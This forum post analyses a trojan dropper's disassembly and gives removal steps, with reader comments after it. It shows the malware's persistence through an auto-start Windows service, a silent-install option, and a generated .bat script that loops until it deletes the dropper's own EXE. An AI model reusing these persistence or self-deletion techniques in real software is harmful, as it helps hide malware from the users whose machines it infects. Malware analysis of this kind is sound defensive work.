00474803 .A1 249E4700 mov eax,dword ptr ds: ;[00479E24] -> service name string
00474808 .8B00 mov eax,dword ptr ds:
0047480A .E8 C503F9FF call Setup.00404BD4 ;eax = PChar(service name)
0047480F .8B0D E89B4700 mov ecx,dword ptr ds: ;Setup.0047B4A8
00474815 .8B09 mov ecx,dword ptr ds: ;ecx = path of the copied binary (the service's image path)
00474817 .5A pop edx ;edx = PChar(display name)
00474818 .E8 FB8AFAFF call Setup.0041D318 ;install service(name=eax, display=edx, image path=ecx, description on stack) - F7; body at 0041D320 below
0041D320 .57 push edi ;0041D318 prologue continues: eax = service name, edx = display name, ecx = image path, [ebp+8] = description
0041D321 .33DB xor ebx,ebx
0041D323 .895D E0 mov dword ptr ss:,ebx ;[ebp-20] = nil (string temporaries zeroed for the finally block)
0041D326 .895D E4 mov dword ptr ss:,ebx ;[ebp-1C] = nil
0041D329 .895D EC mov dword ptr ss:,ebx ;[ebp-14] = nil
0041D32C .894D FC mov dword ptr ss:,ecx ;[ebp-4] = image path (author: "trojan directory")
0041D32F .8BFA mov edi,edx ;edi = display name
0041D331 .8BF0 mov esi,eax ;esi = service name
0041D333 .8B45 FC mov eax,dword ptr ss: ;eax = image path
0041D336 .E8 8978FEFF call Setup.00404BC4 ;string ownership/ref-count bookkeeping on the path - confirm (author wrote "get description", but the description is [ebp+8], handled next)
0041D33B .8B45 08 mov eax,dword ptr ss: ;eax = description ([ebp+8])
0041D33E .E8 8178FEFF call Setup.00404BC4 ;same helper on the description
0041D343 .33C0 xor eax,eax ;start of an SEH frame (continues in the elided lines)
····
····
0041D36F .E8 48A4FEFF call <jmp.&advapi32.OpenSCManagerA> ;OpenSCManagerA (args pushed in the elided lines)
0041D374 .8BD8 mov ebx,eax ;ebx = SC_HANDLE
0041D376 .85DB test ebx,ebx
0041D378 .75 2E jnz short Setup.0041D3A8 ;opened -> continue to CreateServiceA (0041D3BA below)
0041D37A .E8 B997FEFF call <jmp.&kernel32.GetLastError> ; [GetLastError - failure path (typically ERROR_ACCESS_DENIED without admin rights)
0041D37F .8D55 E4 lea edx,dword ptr ss: ;edx = &[ebp-1C]
0041D382 .E8 61ECFEFF call Setup.0040BFE8 ;format the error code as text (SysErrorMessage-style - not verified)
0041D387 .8B4D E4 mov ecx,dword ptr ss: ;ecx = message
0041D38A .B2 01 mov dl,1
0041D38C .A1 CC7B4000 mov eax,dword ptr ds: ;class reference at 00407BCC (an exception class is the natural reading)
0041D391 .E8 7EF4FEFF call Setup.0040C814 ;construct it with the message
0041D396 .E8 316DFEFF call Setup.004040CC ;presumably raise; how this surfaces as al=0 to the caller at 0047481D is not shown
0041D39B .33C0 xor eax,eax ;SEH frame teardown
0041D39D .5A pop edx
0041D39E .59 pop ecx
0041D39F .59 pop ecx
0041D3A0 .64:8910 mov dword ptr fs:,edx
0041D3A3 .E9 2D010000 jmp Setup.0041D4D5 ;to the function epilogue
0047481D .84C0 test al,al ;al = result of the service install
0047481F .75 75 jnz short Setup.00474896 ;service created -> continue
00474821 .6A 00 push 0
00474823 .A1 C49C4700 mov eax,dword ptr ds: ;[00479CC4] -> kernel32.ExitProcess
00474828 .8B00 mov eax,dword ptr ds:
0047482A .FFD0 call eax ;ExitProcess(0) - no service means no persistence, so the dropper quits
0047482C .EB 68 jmp short Setup.00474896 ;(never reached after ExitProcess)
0047482E >8B15 249E4700 mov edx,dword ptr ds: ;Setup.0047B4F4 - jump target reached from outside this excerpt
0041D3BA .50 push eax ; |BinaryPathName = the copied file's path (the five trailing CreateServiceA args were pushed before this excerpt)
0041D3BB .6A 00 push 0 ; |ErrorControl = SERVICE_ERROR_IGNORE
0041D3BD .6A 02 push 2 ; |StartType = SERVICE_AUTO_START - persistence: starts at boot with no user logged on
0041D3BF .68 10010000 push 110 ; |ServiceType = SERVICE_WIN32_OWN_PROCESS|SERVICE_INTERACTIVE_PROCESS (0x100 = interactive, a pre-Vista-era pattern)
0041D3C4 .68 FF010F00 push 0F01FF ; |DesiredAccess = SERVICE_ALL_ACCESS
0041D3C9 .57 push edi ; |DisplayName (from the decrypted config)
0041D3CA .56 push esi ; |ServiceName (from the decrypted config)
0041D3CB .53 push ebx ; |hManager
0041D3CC .E8 CBA3FEFF call <jmp.&advapi32.CreateServiceA> ; \CreateServiceA
0041D3D1 .8945 F4 mov dword ptr ss:,eax ;[ebp-C] = SC_HANDLE of the new service
0041D3D4 .837D F4 00 cmp dword ptr ss:,0
0041D3D8 .75 2E jnz short Setup.0041D408 ;created -> go set the description
0041D3DA .E8 5997FEFF call <jmp.&kernel32.GetLastError> ; [GetLastError
0041D3DF .8D55 E0 lea edx,dword ptr ss: ;error path (same shape as at 0041D37A; elided)
0041D465 .E8 56C3FEFF call Setup.004097C0 ;copies the description string into the buffer at [ebp-10] (author: "loop copying description strings")
0041D46A .8B45 F0 mov eax,dword ptr ss:
0041D46D .50 push eax ;lpInfo -> SERVICE_DESCRIPTION
0041D46E .6A 01 push 1 ;dwInfoLevel = 1 = SERVICE_CONFIG_DESCRIPTION
0041D470 .8B45 F4 mov eax,dword ptr ss:
0041D473 .50 push eax ;hService
0041D474 .A1 089E4700 mov eax,dword ptr ds: ;[00479E08] -> advapi32.ChangeServiceConfig2A, resolved at run time rather than imported (presumably to keep loading on platforms that lack it)
0041D479 .8B00 mov eax,dword ptr ds:
0041D47B .FFD0 call eax ;(advapi32.ChangeServiceConfig2A) - sets a description, presumably to blend in with legitimate services
0041D4AF .8B45 F4 mov eax,dword ptr ss: ;hService
0041D4B2 .50 push eax
0041D4B3 .E8 3CA3FEFF call <jmp.&advapi32.StartServiceA> ;StartServiceA (argc/argv pushed in the elided lines) - the service runs immediately, not only after a reboot
0041D4B8 .8B45 F4 mov eax,dword ptr ss:
0041D4BB .50 push eax
0041D4BC .E8 CBA2FEFF call <jmp.&advapi32.CloseServiceHandle>
0041D4C1 .33C0 xor eax,eax ;SEH frame teardown
0041D4C3 .5A pop edx
0041D4C4 .59 pop ecx
0041D4C5 .59 pop ecx
0047481F . /75 75 jnz short Setup.00474896 ;(the author pasted this 0047481F branch a second time) service created -> continue
00474821 . |6A 00 push 0
00474823 . |A1 C49C4700 mov eax,dword ptr ds: ;[00479CC4] -> kernel32.ExitProcess
00474828 . |8B00 mov eax,dword ptr ds:
0047482A . |FFD0 call eax ;ExitProcess(0)
0047482C . |EB 68 jmp short Setup.00474896
0047482E > |8B15 249E4700 mov edx,dword ptr ds: ;Setup.0047B4F4
00474834 . |8B12 mov edx,dword ptr ds: ;edx = string at [0047B4F4]
00474836 . |33C0 xor eax,eax ;index 0 (rest of this branch elided)
004748A3 . /75 20 jnz short Setup.004748C5 ;"silent" flag set -> no message box (author: an option chosen when the trojan was built)
004748A5 . |803D 74C64700>cmp byte ptr ds:,0 ;[0047C674] second suppress flag
004748AC . |75 17 jnz short Setup.004748C5
004748AE . |6A 40 push 40 ;uType = MB_ICONINFORMATION
004748B0 . |68 78494700 push Setup.00474978 ;ASCII "wo shi mu ma" (pinyin: "I am a trojan") - caption
004748B5 . |68 84494700 push Setup.00474984 ;ASCII "installed successfully" - text
004748BA . |6A 00 push 0 ;hWnd = NULL
004748BC . |A1 B09B4700 mov eax,dword ptr ds: ;[00479BB0] -> resolved import pointer
004748C1 . |8B00 mov eax,dword ptr ds:
004748C3 . |FFD0 call eax ;presumably user32.MessageBoxA (the argument shape matches; the pointer's target is not shown)
004748C5 > \A1 949A4700 mov eax,dword ptr ds: ;[00479A94] self-delete flag (the compare between this line and the je was not pasted)
004748CD . /74 12 je short Setup.004748E1 ;flag clear -> exit without self-deleting
004748CF . |8D55 E0 lea edx,dword ptr ss: ;edx = &[ebp-20] (the author's "description" label is a mislabel: this receives the own path, as at 00474600)
004748D2 . |33C0 xor eax,eax ;index 0
004748D4 . |E8 8BE2F8FF call Setup.00402B64 ;own module path (body at 00402B7A below)
00402B7A|. /75 1E jnz short Setup.00402B9A ;index != 0 -> take the parameter from GetCommandLineA (ParamStr(n)-style helper; entry at 00402B64)
00402B7C|. |68 05010000 push 105 ; /BufSize = 105 (261.) = MAX_PATH + 1
00402B81|. |8D4424 04 lea eax,dword ptr ss: ; |stack buffer
00402B85|. |50 push eax ; |PathBuffer
00402B86|. |6A 00 push 0 ; |hModule = NULL -> path of the running EXE
00402B88|. |E8 27E7FFFF call <jmp.&kernel32.GetModuleFileNameA> ; \GetModuleFileNameA
00402B8D|. |8BC8 mov ecx,eax ;ecx = returned length (0 on failure - not checked; the string just comes back empty)
00402B8F|. |8BD4 mov edx,esp ;edx = buffer
00402B91|. |8BC3 mov eax,ebx ;eax = destination string var
00402B93|. |E8 6C1C0000 call Setup.00404804 ;string := buffer[0..len)
00402B98|. |EB 1E jmp short Setup.00402BB8
00402B9A|> \E8 F5E6FFFF call <jmp.&kernel32.GetCommandLineA> ; [GetCommandLineA (parsing continues outside the excerpt)
004748D9 . |8B45 E0 mov eax,dword ptr ss: ;eax = own path
004748DC . |E8 4F39FFFF call Setup.00468230 ;self-delete via a generated .bat - F7 (builder at 00468296 below); the author calls it "classic"
00468296 .68 DC834600 push Setup.004683DC ;".bat" - third part of the script path (the first two parts were pushed before this excerpt)
0046829B .8D45 F8 lea eax,dword ptr ss: ;eax = &[ebp-8] script path
0046829E .BA 03000000 mov edx,3 ;concatenate 3 parts
004682A3 .E8 ECC7F9FF call Setup.00404A94 ;[ebp-8] = <dir><name>.bat - the script is a forensic artefact if the loop never reaches `del %0`
004682A8 .B2 01 mov dl,1
004682AA .A1 10304100 mov eax,dword ptr ds: ;class at 00410310 (the same string-list-style class as at 00463982)
004682AF .E8 5CB6F9FF call Setup.00403910 ;construct
004682B4 .8BD8 mov ebx,eax ;ebx = list
004682B6 .BA EC834600 mov edx,Setup.004683EC ;":delfile"
004682BB .8BC3 mov eax,ebx
004682BD .8B08 mov ecx,dword ptr ds:
004682BF .FF51 38 call dword ptr ds: ;list.Add(":delfile") (virtual slot +38)
004682C2 .68 00844600 push Setup.00468400 ;del "
004682C7 .FF75 FC push dword ptr ss: ;[ebp-4] = path of the file to delete (the dropper's own EXE)
004682CA .68 10844600 push Setup.00468410 ;"
004682CF .8D45 98 lea eax,dword ptr ss:
004682D2 .BA 03000000 mov edx,3
004682D7 .E8 B8C7F9FF call Setup.00404A94 ;[ebp-68] = del "<path>"
004682DC .8B55 98 mov edx,dword ptr ss:
004682DF .8BC3 mov eax,ebx
004682E1 .8B08 mov ecx,dword ptr ds:
004682E3 .FF51 38 call dword ptr ds: ;list.Add(del "<path>")
004682E6 .68 1C844600 push Setup.0046841C ;if exist "
004682EB .FF75 FC push dword ptr ss:
004682EE .68 30844600 push Setup.00468430 ;" goto delfile
004682F3 .8D45 94 lea eax,dword ptr ss:
004682F6 .BA 03000000 mov edx,3
004682FB .E8 94C7F9FF call Setup.00404A94 ;[ebp-6C] = if exist "<path>" goto delfile - busy-loops until the EXE is no longer locked
00468300 .8B55 94 mov edx,dword ptr ss:
00468303 .8BC3 mov eax,ebx
00468305 .8B08 mov ecx,dword ptr ds:
00468307 .FF51 38 call dword ptr ds: ;list.Add(if exist ... goto delfile)
0046830A .BA 48844600 mov edx,Setup.00468448 ;del %0 - the script then removes itself
0046830F .8BC3 mov eax,ebx
00468311 .8B08 mov ecx,dword ptr ds:
00468313 .FF51 38 call dword ptr ds: ;list.Add("del %0")
00468316 .BA 58844600 mov edx,Setup.00468458 ;exit (its Add, saving the .bat and launching it all follow outside this excerpt)
004748E1 > \6A 00 push 0 ;uExitCode = 0 - exit path (target of the je at 004748CD)
004748E3 .A1 C49C4700 mov eax,dword ptr ds: ;[00479CC4] -> kernel32.ExitProcess
004748E8 .8B00 mov eax,dword ptr ds:
004748EA .FFD0 call eax ;kernel32.ExitProcess(0)
Overall flow:
1. Create a mutex ("SJhensoie23sdsf"); if CreateMutexA reports ERROR_ALREADY_EXISTS (0xB7) the process exits, so only one instance runs.
2. Check whether a copy already exists at the install path (it first compares its own path with lstrcmpiA and skips installation when they match). If an old copy exists, clear its attributes and delete it; if the delete fails, re-hide it (READONLY|HIDDEN|SYSTEM) and exit. Otherwise copy itself there, rewrite the copy's timestamp and set its file attributes.
3. Read its encrypted configuration (install directory, service names/description, and the check-in/C2 address) from the "TFrom2" resource and decrypt it. (In the listing this actually happens before the mutex check, inside the call at 004745CF; the order here follows the author's summary.)
4. Delete any existing service of the same name, then create a service (SERVICE_AUTO_START, SERVICE_WIN32_OWN_PROCESS|SERVICE_INTERACTIVE_PROCESS) pointing at the copy, set its description with ChangeServiceConfig2A and start it - this is the persistence mechanism.
5. Delete itself with a generated .bat (`:delfile` / `del "<path>"` / `if exist "<path>" goto delfile` / `del %0` / `exit`).
Removal:
Open XueTr.exe, look at the service list - the trojan's service stands out (its entry is coloured differently) - disconnect the network, stop the service, locate the binary path and delete the file. Also check the Run key (a "SoftWare\Microsoft\Windows\CurrentVersion\Run" string is among the decrypted configuration strings, although this excerpt does not show it being written), look for the leftover .bat file, and note that *.dat files under C:\WINDOWS (e.g. bootstat.dat) may have been deleted.
当哥懂得还真多啊 强悍的,我是一窍不通!顶! 这个木马是干什么的 可耻的一窍不通 呵呵!看不懂…… 看不懂· 啊~ 菜鸟学习一下! 仔细看了,还是找不出是哪里出现问题。我太菜了 {:1_918:}这些木马哪找的?